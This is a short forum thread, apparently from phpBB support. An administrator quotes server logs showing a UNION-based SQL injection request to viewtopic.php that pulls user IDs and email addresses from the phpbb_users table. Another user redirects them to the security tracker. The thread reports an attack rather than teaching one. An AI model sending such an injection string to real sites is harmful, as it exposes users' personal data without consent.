Page 1 of 1

Where is this query form

Posted: Tue Nov 30, 2010 2:33 pm
by Ciao121
Hi,
today I have an high load on my server and I saw many queries like this one:
"SELECT forum_id FROM phpbb_posts where post_id=5192068 and 5=6 union select concat....."
Seems a strange query to me (what does it means "5=6"?)... :shock:

Re: Where is this query form

Posted: Tue Nov 30, 2010 2:41 pm
by Ciao121
Found an http call like this:
"GET /viewtopic.php?p=5192068%20and%205=6%20union%20select%20concat(0x5E252421,ifnull(`user_id`,0x4E554C4C),char(9),ifnull(`user_email`,0x4E554C4C),char(9),0x2A5B7D2F)%20from%20`phpbb`.`phpbb_users`%20limit%20255769,1%20%20-- HTTP/1.1"

What is this "user" trying to do???

Re: Where is this query form

Posted: Tue Nov 30, 2010 2:51 pm
by Brf
Please repost this on the security tracker: http://www.phpbb.com/security/phpbb3/